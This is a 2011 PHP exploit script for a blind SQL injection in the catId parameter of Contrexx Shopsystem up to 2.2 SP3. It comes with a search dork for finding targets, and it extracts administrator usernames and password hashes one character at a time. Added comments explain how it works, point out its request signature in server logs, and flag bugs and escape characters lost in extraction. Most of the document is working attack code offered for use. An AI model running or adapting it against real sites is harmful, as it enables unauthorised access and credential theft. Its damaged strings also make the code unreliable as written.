# Title : Contrexx Shopsystem =<2.2 SP3 (catId) Blind SQL Injection
# Published : 2011-08-17
# Author :
#!/usr/bin/php
<?php
/*
Exploit title: Contrexx Shopsystem Blind SQL Injection Exploit
Exploit written by: Penguin
Exploit: index.php?section=shop&catId=[VALID categoryid] and [YOUR BLIND SQL CODE]
Exploit tested on: Debian 6, Ubuntu Linux 11.04
Software price: about 700 CHF
Vendor: http://www.contrexx.com
Found by: Penguin
Version: =< 2.2 SP 3
Dork: inurl:index.php?section=shop&catId=
Vendor: www.contrexx.com
Visit: www.null-sector.info
Greets to: Blacktiger/Luxy, ErrorX, hAgBaRd2ooo, KrimiX, zYiix, reutz/head
*/
// Console banner. The "rn" ending every string in this file is almost certainly "\r\n"
// with the backslashes lost during extraction; it is left untouched here.
echo "#######################################rn";
echo "# Contrexx Shopsystem Exploit #rn";
echo "# Exploit Type: Blind SQL Injection #rn";
echo "# Programmed by: Penguin #rn";
echo "# Visit www.null-sector.info #rn";
echo "#######################################rn";
// Three positional arguments are required ($argc counts the script name itself). The usage
// text presents the third one in parentheses as if optional, but this check does not.
if($argc < 4)
{
echo "Usage: ./exploit.php [TARGET_URL] [CATID] (Admin User Limit)rn";
echo "TARGET_URL = http://demo.de/index.phprn";
echo "CATID = CategoryId (MUST BE VALID!)rn";
echo "Admin User Limit = Limit x,0 @ Selecting! Standard: 0rn";
die();
}
// Config Variables
// Base URL for every probe: argv[1] and argv[2] are concatenated verbatim, with no validation.
$target_url = $argv[1] . "?section=shop&catId=" . $argv[2];
// Printable-ASCII code-point range tried per username character ('!' .. '~').
// getUsername treats the end value as exclusive, so 126 ('~') itself is never tried.
$charset_start_usr = 33;
$charset_end_usr = 126;
// Code points of '0'-'9' and 'a'-'f': the alphabet of a lowercase hex digest.
$charset_hash = Array(48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
// Exclusive upper bound on the username length that getUsername will probe.
$toLength = 100;
//Functions
// Boolean-based blind extraction of one admin username from contrexx_access_users, driven
// through the catId parameter. The answer to each probe is read from whether the shop page
// still renders its description block (testIt): true means the appended condition held.
// Probes use slash-star-star-slash comment sequences in place of spaces and name the table
// literally, so the request pattern (many GETs to the same catId differing only in the
// trailing condition) is straightforward to match in web-server or WAF logs.
// $toLength      exclusive upper bound on the length values tried
// $charset_start first code point tried at each character position
// $charset_end   exclusive upper bound of the code points tried at each position
// $target_url    base URL including ?section=shop&catId=<id>
// $limit         LIMIT offset selecting which is_admin = 1 row is read; used verbatim
// Returns the string assembled from the per-position results; calls die() if no length matched.
function getUsername($toLength, $charset_start, $charset_end, $target_url,$limit)
{
$username = "";
// Get Length
// Phase 1: find the username length by testing length(username) = i for i in [0, $toLength).
$length = -1;
for($i=0;$i<$toLength;$i++)
{
$url = $target_url . "/**/and/**/(select/**/length(username)/**/from/**/contrexx_access_users/**/where/**/is_admin/**/=/**/1/**/limit/**/$limit,1)=" . $i;
// The return value is not checked: a failed fetch yields false, which testIt reads as "no match".
$src = file_get_contents($url);
if(testIt($src) == true)
{
$length = $i;
break;
}
}
if ($length == -1)
{
die("There was a problem @ fetching username length :(rn");
}
echo "Username length: $length !rn";
$username = "";
echo "Username: ";
// Phase 2: for each position, compare substring(username, p, 1) against every candidate code point.
for($k=0;$k<$length;$k++)
{
$charToAdd = "";
for($c=$charset_start;$c<$charset_end;$c++)
{
$p = $k+1; // SQL substring() positions are 1-based
$src = file_get_contents($target_url . "/**/and/**/substring((select/**/username/**/from/**/contrexx_access_users/**/where/**/is_admin/**/=/**/1/**/limit/**/$limit,1),$p,1)=char($c)");
if(testIt($src) == true)
{
$charToAdd = $c;
break;
}
}
// What is echoed and appended is the loop variable $c, not $charToAdd; if no candidate
// matched, $c has already run up to $charset_end at this point.
echo chr($c);
$username .= chr($c);
}
echo "rn";
return $username;
}
// Blind extraction of the selected admin's password field: 32 fixed positions, each compared
// against the hex alphabet in $charset. That shape matches a 32-character hex digest, which the
// script assumes rather than verifies. Same probe form and log signature as getUsername
// (substring() of a subselect compared to char()).
// $toLength   accepted but unused
// $charset    list of candidate code points tried at each position
// $target_url base URL including ?section=shop&catId=<id>
// $limit      LIMIT offset, used verbatim in the query
// Returns the string assembled from the first matching candidate at each of the 32 positions.
function getHash($toLength, $charset, $target_url,$limit)
{
// Get Hash
$hash = "";
echo "Hash: ";
for($k=0;$k<32;$k++)
{
$charToAdd = "";
for($c=0;$c<count($charset);$c++)
{
$p = $k+1; // SQL substring() positions are 1-based
$z = $charset[$c];
$src = file_get_contents($target_url . "/**/and/**/substring((select/**/password/**/from/**/contrexx_access_users/**/where/**/is_admin/**/=/**/1/**/limit/**/$limit,1),$p,1)=char($z)");
// Debug leftover: every response body is written to test.html in the working directory,
// overwritten on each request; the return value is not checked.
file_put_contents("test.html",$src);
if(testIt($src) == true)
{
$charToAdd = $charset[$c];
break;
}
}
// If no candidate matched, $charToAdd is still "" and that empty string is what reaches chr().
echo chr($charToAdd);
$hash .= chr($charToAdd);
}
echo "rn";
return $hash;
}
// Oracle for the blind probes: true when the fetched page contains at least one
// <div class="description"> element, i.e. the shop page rendered its content.
// The marker is written in single quotes here; the double-quoted form on the
// original page had lost its escaping in extraction.
// $src  response body, or false when file_get_contents failed (coerces to "" -> false).
function testIt($src)
{
    $marker = '<div class="description">';
    return substr_count($src, $marker) >= 1;
}
echo "Starting exploit....rnChecking if Vulnerable...";
// Vulnerability probe: a single quote appended to catId. If the page *still* renders its
// description block, the target is declared not vulnerable -- the script expects an unescaped
// quote to break the query and blank the page. A site that validates catId server-side
// (integer cast or a parameterised query) renders normally here and is therefore skipped.
$check = file_get_contents($target_url . "'");
if(testIt($check) == true)
{
die("Target is not Vulnerable :(rn");
}
// LIMIT offset for the admin row; used verbatim in every query, never checked to be an integer.
$myLimit = $argv[3];
echo "Target is Vulnerable :)rn";
echo "Starting the SQL Injection...rn";
echo "Fetching Username...rn";
$username = getUsername($toLength, $charset_start_usr, $charset_end_usr, $target_url,$myLimit);
$hash = getHash($toLength,$charset_hash,$target_url,$myLimit);
echo "Exploited Successfully!rn";
// "$hashrn" interpolates a variable named hashrn as written; another symptom of the lost
// backslashes ("$hash\r\n" in the original, presumably).
echo "Full Logindata: $username : $hashrn";
echo "Have fun ;)rn";
?>